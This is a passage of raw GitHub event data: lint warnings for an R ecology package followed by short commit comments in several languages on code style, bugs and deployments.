characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:44:11:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/invoercontroleData_voorwaarden.R#L44) *warning:* **local variable 'z' assigned but may not be used**\n```r\n<U+200B>          z <- tolower(x)\n          ^\n```\n[R/invoercontroleData_voorwaarden.R:62:1:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/invoercontroleData_voorwaarden.R#L62) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:63:1:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/invoercontroleData_voorwaarden.R#L63) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:55:1:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/selecteerKenmerkenInOpname.R#L55) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_1_databank.R:38:15:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/inst/tests/testthat/test_1_databank.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>        ) %in% \n              ^\n```\n[inst/tests/testthat/test_1_databank.R:475:1:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/inst/tests/testthat/test_1_databank.R#L475) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_1_databank.R:476:1:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/inst/tests/testthat/test_1_databank.R#L476) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:555:1:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/inst/tests/testthat/test_berekenLSVIbasis.R#L555) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:556:1:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/inst/tests/testthat/test_berekenLSVIbasis.R#L556) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:21:1:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L21) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  mutate(  #idee is om onderstaande code te wissen zodra de rekenmodule hiervoor aangepast is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:53:3:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L53) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test_bos.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:54:3:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L54) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test_bos.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:63:53:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L63) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>        Versie = \"Versie 3\", Kwaliteitsniveau = \"1\", \n                                                    ^\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:71:53:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L71) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>        Versie = \"Versie 3\", Kwaliteitsniveau = \"1\", \n                                                    ^\n```\n[inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R:88:55:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/inst/tests/testthat/test_berekenLSVIbasis_vegetatielaag.R#L88) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>          Versie = \"Versie 3\", Kwaliteitsniveau = \"1\", \n                                                      ^\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/2fbc3fbffbd14262604b5fde9fdc2944aad26d8a/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-27T15:56:00Z"}
{"id":"8029419622","type":"CommitCommentEvent","actor":{"login":"EndLess728"},"repo":{"name":"AEXmod/platform_packages_apps_Dialer"},"payload":{"comment":{"id":29860450,"position":null,"line":null,"path":null,"commit_id":"9b19da9e935e9907e41e0392a07e62238a827ac4","created_at":"2018-07-27T15:56:13Z","updated_at":"2018-07-27T15:56:13Z","author_association":"NONE","body":"Bug :- if We Minimize the call during calls to do some other work on other apps or just only minimize it , the recording time resets and start again when we come back to call "}},"created_at":"2018-07-27T15:56:13Z"}
{"id":"8029422870","type":"CommitCommentEvent","actor":{"login":"TrySound"},"repo":{"name":"rollup/awesome"},"payload":{"comment":{"id":29860459,"position":null,"line":null,"path":null,"commit_id":"df916c9aa088985bd014dccef48d204ce36c311c","created_at":"2018-07-27T15:56:52Z","updated_at":"2018-07-27T15:56:52Z","author_association":"MEMBER","body":"Sorry, github by default commits to master. Forgot to change radio box"}},"created_at":"2018-07-27T15:56:52Z"}
{"id":"8029423514","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860461,"position":66,"line":66,"path":"course_1/part_3/days.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T15:57:00Z","updated_at":"2018-07-27T15:57:00Z","author_association":"NONE","body":"в случае, если код в блоке короткий, рекомендуется писать однострочные блоки в фигруных скобках\r\nк примеру так:\r\n```ruby\r\narray.each { |element| do_something(element) }\r\n```\r\n"}},"created_at":"2018-07-27T15:57:00Z"}
{"id":"8029425287","type":"CommitCommentEvent","actor":{"login":"barisusakli"},"repo":{"name":"NodeBB/NodeBB"},"payload":{"comment":{"id":29860466,"position":4,"line":16,"path":"src/user/auth.js","commit_id":"b6a5419ca11c616c1837420264473b9d131987b1","created_at":"2018-07-27T15:57:21Z","updated_at":"2018-07-27T15:57:21Z","author_association":"MEMBER","body":"🍌 "}},"created_at":"2018-07-27T15:57:21Z"}
{"id":"8029425522","type":"CommitCommentEvent","actor":{"login":"dsh2dsh"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29860468,"position":null,"line":null,"path":null,"commit_id":"8f1e10f085c61359e8b886462671642f64a53ea8","created_at":"2018-07-27T15:57:23Z","updated_at":"2018-07-27T15:57:23Z","author_association":"COLLABORATOR","body":"> там данные о типе и кол-ве патронов в стволе\r\n\r\nТочно, забыл. Тогда нехорошо получается, мне кажется. 5 бит - это 31. Но я знаю как минимум один калаш, у которого сдвоенный рожок и там 60 патронов.\r\n\r\nМожет лучше в GrenadeMode использовать один бит для флажка расширенного режима и при его наличии использовать доп. байты для кол-ва и типа?\r\n"}},"created_at":"2018-07-27T15:57:23Z"}
{"id":"8029427834","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860471,"position":62,"line":62,"path":"course_1/part_3/days.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T15:57:49Z","updated_at":"2018-07-27T15:57:49Z","author_association":"NONE","body":"можно здесь присвоить не ноль, а `day` и 68 строка не понадобится"}},"created_at":"2018-07-27T15:57:49Z"}
{"id":"8029427904","type":"CommitCommentEvent","actor":{"login":"julianlam"},"repo":{"name":"NodeBB/NodeBB"},"payload":{"comment":{"id":29860472,"position":4,"line":16,"path":"src/user/auth.js","commit_id":"b6a5419ca11c616c1837420264473b9d131987b1","created_at":"2018-07-27T15:57:50Z","updated_at":"2018-07-27T15:57:50Z","author_association":"MEMBER","body":":-1:"}},"created_at":"2018-07-27T15:57:50Z"}
{"id":"8029433009","type":"CommitCommentEvent","actor":{"login":"jlipps"},"repo":{"name":"appium/appium-base-driver"},"payload":{"comment":{"id":29860487,"position":5,"line":6,"path":"index.js","commit_id":"839cea5f139c9f3f0a5c8d87ad2a963680b538d3","created_at":"2018-07-27T15:58:48Z","updated_at":"2018-07-27T15:58:48Z","author_association":"MEMBER","body":"no this is right. DeviceSettings is the default export"}},"created_at":"2018-07-27T15:58:48Z"}
{"id":"8029433952","type":"CommitCommentEvent","actor":{"login":"BeT07"},"repo":{"name":"BeT07/Propedeutico-2"},"payload":{"comment":{"id":29860491,"position":null,"line":null,"path":null,"commit_id":"c98ed9aa923896c7d72e0b8c5041538e2dcefba3","created_at":"2018-07-27T15:58:58Z","updated_at":"2018-07-27T15:58:58Z","author_association":"OWNER","body":"Modificar el archivo numero 2"}},"created_at":"2018-07-27T15:58:58Z"}
{"id":"8029434870","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29860494,"position":null,"line":null,"path":null,"commit_id":"cc4af1f1927e35c8b25048e1f7cec04d9bb5cbf8","created_at":"2018-07-27T15:59:10Z","updated_at":"2018-07-27T15:59:10Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3737cache](https://3737cache-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/caching-advanced-topics](https://3737cache-static-docs.pantheonsite.io/docs/caching-advanced-topics)\n"}},"created_at":"2018-07-27T15:59:10Z"}
{"id":"8029436129","type":"CommitCommentEvent","actor":{"login":"wanyaworld"},"repo":{"name":"wanyaworld/parallelNOVA"},"payload":{"comment":{"id":29860497,"position":null,"line":null,"path":null,"commit_id":"c3b3f1a529e5beb0e403f76e36eb0afd32ccce40","created_at":"2018-07-27T15:59:24Z","updated_at":"2018-07-27T15:59:24Z","author_association":"OWNER","body":"Junghyung, to make our parallel write process take the different function call paths from other nova functions, I separated _nova_reassign_file_tree_ and _nova_append_file_write_entry_, by appending \"_parallel\" suffix. This will guarantee, hopefully, other functions not to see the changes we made."}},"created_at":"2018-07-27T15:59:24Z"}
{"id":"8029436192","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29860498,"position":4,"line":10,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T15:59:25Z","updated_at":"2018-07-27T15:59:25Z","author_association":"OWNER","body":"\"...неправильно, что аттрибуты first, last доступны из-вне класса для прямого изменения...\"\r\n- Хммм..А почему собственно? Я как раз и хотел, чтобы их менять было можно. А вдруг изначально задали неправильно? с синтаксической ошибкой например! \r\nА про privatе - речи вообще еще нигде не было! И зачем это нужно я пока не знаю ((."}},"created_at":"2018-07-27T15:59:25Z"}
{"id":"8029443255","type":"CommitCommentEvent","actor":{"login":"JH816"},"repo":{"name":"JH816/JH816.github.io"},"payload":{"comment":{"id":29860518,"position":null,"line":null,"path":null,"commit_id":"15c45391aade02f18d815b2a282aab848e6fe3a5","created_at":"2018-07-27T16:00:43Z","updated_at":"2018-07-27T16:00:43Z","author_association":"OWNER","body":"**Hello!**"}},"created_at":"2018-07-27T16:00:43Z"}
{"id":"8029446378","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860529,"position":64,"line":64,"path":"course_1/part_3/days.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T16:01:18Z","updated_at":"2018-07-27T16:01:18Z","author_association":"NONE","body":"рекомендуется давать переменным \"говорящие\" имена, чтобы впоследствии было проще читать и понимать код\r\n\r\nк примеру данную переменную, вместо `m` можно было бы назвать `month_days` (или еще как-то в подобном стиле)"}},"created_at":"2018-07-27T16:01:18Z"}
{"id":"8029446974","type":"CommitCommentEvent","actor":{"login":"jeffbski"},"repo":{"name":"KevinAst/feature-u"},"payload":{"comment":{"id":29860531,"position":null,"line":null,"path":null,"commit_id":"0af60029176029d4cce556a7eb616f541ba24388","created_at":"2018-07-27T16:01:25Z","updated_at":"2018-07-27T16:01:25Z","author_association":"NONE","body":"Did you try setImmediate here instead? Since this delays but runs before the next turn of the event loop, I wonder if it would work. It's worth a try. `setImmediate(fn)`\r\n "}},"created_at":"2018-07-27T16:01:25Z"}
{"id":"8029451570","type":"CommitCommentEvent","actor":{"login":"Begasus"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29860540,"position":null,"line":null,"path":null,"commit_id":"b52dff5267a144de293c9c06f7b0102ee22258b4","created_at":"2018-07-27T16:02:20Z","updated_at":"2018-07-27T16:02:20Z","author_association":"CONTRIBUTOR","body":"Did you check the proto changes/util-macros changes, also libXdmcp is new, maybe it's not provided there?"}},"created_at":"2018-07-27T16:02:20Z"}
{"id":"8029451837","type":"CommitCommentEvent","actor":{"login":"noyfon"},"repo":{"name":"Levak/warfacebot"},"payload":{"comment":{"id":29860541,"position":null,"line":null,"path":null,"commit_id":"995fa9137c833723ad6d89f307b6ef4451047f4c","created_at":"2018-07-27T16:02:22Z","updated_at":"2018-07-27T16:02:22Z","author_association":"NONE","body":"как скачать обновлённую версию ботов без танцев с бубном,будьте добры дайте ссылку"}},"created_at":"2018-07-27T16:02:22Z"}
{"id":"8029453334","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29860546,"position":7,"line":13,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T16:02:41Z","updated_at":"2018-07-27T16:02:41Z","author_association":"OWNER","body":"И где же в задании это указано? Почему об этом приходится узнавать  уже по ходу дела?"}},"created_at":"2018-07-27T16:02:41Z"}
{"id":"8029455411","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860550,"position":8,"line":8,"path":"course_1/part_3/fibonacci.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T16:03:07Z","updated_at":"2018-07-27T16:03:07Z","author_association":"NONE","body":"чтобы взять последний и предпоследние элементы можно использовать индексы `- 1` и `- 2`, тогда не нужно считать индекс и хранить его в переменной\r\n\r\nвот так:\r\n```ruby\r\nelement = fibbonacci[-1] + fibbonacci[-2]\r\n```"}},"created_at":"2018-07-27T16:03:07Z"}
{"id":"8029456861","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Sprint-Challenge-Node-Express"},"payload":{"comment":{"id":29860551,"position":null,"line":null,"path":null,"commit_id":"b89ad4b8e97ea133b98e995a779b9a520e3a86c4","created_at":"2018-07-27T16:03:25Z","updated_at":"2018-07-27T16:03:25Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementation](https://trello.com/c/IphmPBE8/1-implementation)"}},"created_at":"2018-07-27T16:03:25Z"}
{"id":"8029457557","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Sprint-Challenge-Node-Express"},"payload":{"comment":{"id":29860553,"position":null,"line":null,"path":null,"commit_id":"43e069a7db7fe3a88c3d7747c3644065013047dc","created_at":"2018-07-27T16:03:33Z","updated_at":"2018-07-27T16:03:33Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Review.md](https://trello.com/c/SZ4vsUdp/7-reviewmd)"}},"created_at":"2018-07-27T16:03:33Z"}
{"id":"8029458431","type":"CommitCommentEvent","actor":{"login":"dshoulders"},"repo":{"name":"manywho/ui-offline"},"payload":{"comment":{"id":29860557,"position":11,"line":15,"path":"js/services/PageConditions.ts","commit_id":"8ddb577379baa1db59c9b5203ea6e8f110fb5d51","created_at":"2018-07-27T16:03:43Z","updated_at":"2018-07-27T16:03:43Z","author_association":"CONTRIBUTOR","body":"I don't think the self invoked function is necessary. Could either export the functions individually or set an object that references them as the default export."}},"created_at":"2018-07-27T16:03:43Z"}
{"id":"8029459333","type":"CommitCommentEvent","actor":{"login":"lijun0326"},"repo":{"name":"gesedna/GeseCodingFun"},"payload":{"comment":{"id":29860561,"position":null,"line":null,"path":null,"commit_id":"e67cc459f2e0778e4f7e4549554ad6b331c6d664","created_at":"2018-07-27T16:03:53Z","updated_at":"2018-07-27T16:03:53Z","author_association":"NONE","body":"Run Forest,Run!\r\n"}},"created_at":"2018-07-27T16:03:53Z"}
{"id":"8029468178","type":"CommitCommentEvent","actor":{"login":"KevinAst"},"repo":{"name":"KevinAst/feature-u"},"payload":{"comment":{"id":29860576,"position":null,"line":null,"path":null,"commit_id":"0af60029176029d4cce556a7eb616f541ba24388","created_at":"2018-07-27T16:05:41Z","updated_at":"2018-07-27T16:05:41Z","author_association":"OWNER","body":"We can discuss this, but I am scared of setImmediate().  According to MDM [setImmediate()](https://developer.mozilla.org/en-US/docs/Web/API/Window/setImmediate) is **very much non-standare**.\r\n"}},"created_at":"2018-07-27T16:05:41Z"}
{"id":"8029468548","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860578,"position":2,"line":2,"path":"course_1/part_3/fibonacci.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T16:05:46Z","updated_at":"2018-07-27T16:05:46Z","author_association":"NONE","body":"лучше не увлекаться подобными префиксами\r\nв большой программе массивов моугуть быть сотни и тысячи, если каждый начинается с `array_`, то это усложнит и написание и чтение кода\r\nправильней просто давать соотвествующие контексту имена, без ссылки на то, что именно хранится в переменной - массив, хеш, строка, символ"}},"created_at":"2018-07-27T16:05:46Z"}
{"id":"8029470515","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29860579,"position":11,"line":17,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T16:06:10Z","updated_at":"2018-07-27T16:06:10Z","author_association":"OWNER","body":"да..да.. но на момент написания я еще не прощупал до конца возможности методов по массиву..\r\nЯ сам понимаю, что корявый вариант..с этим others"}},"created_at":"2018-07-27T16:06:10Z"}
{"id":"8029476950","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860588,"position":3,"line":3,"path":"course_1/part_3/fibonacci.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T16:07:31Z","updated_at":"2018-07-27T16:07:31Z","author_association":"NONE","body":"эта строчка лишняя, лучше в предыдущей инициализировать массив вот так: `fibbonacci = [a]`"}},"created_at":"2018-07-27T16:07:31Z"}
{"id":"8029477096","type":"CommitCommentEvent","actor":{"login":"patrickkempff"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29860589,"position":null,"line":null,"path":null,"commit_id":"076b1cea3563cae30e11d63cc100ceaed9082692","created_at":"2018-07-27T16:07:32Z","updated_at":"2018-07-27T16:07:32Z","author_association":"COLLABORATOR","body":"@aecorredor I am not sure what you mean, but this commit has been merged in master and shipped as part of 0.56."}},"created_at":"2018-07-27T16:07:32Z"}
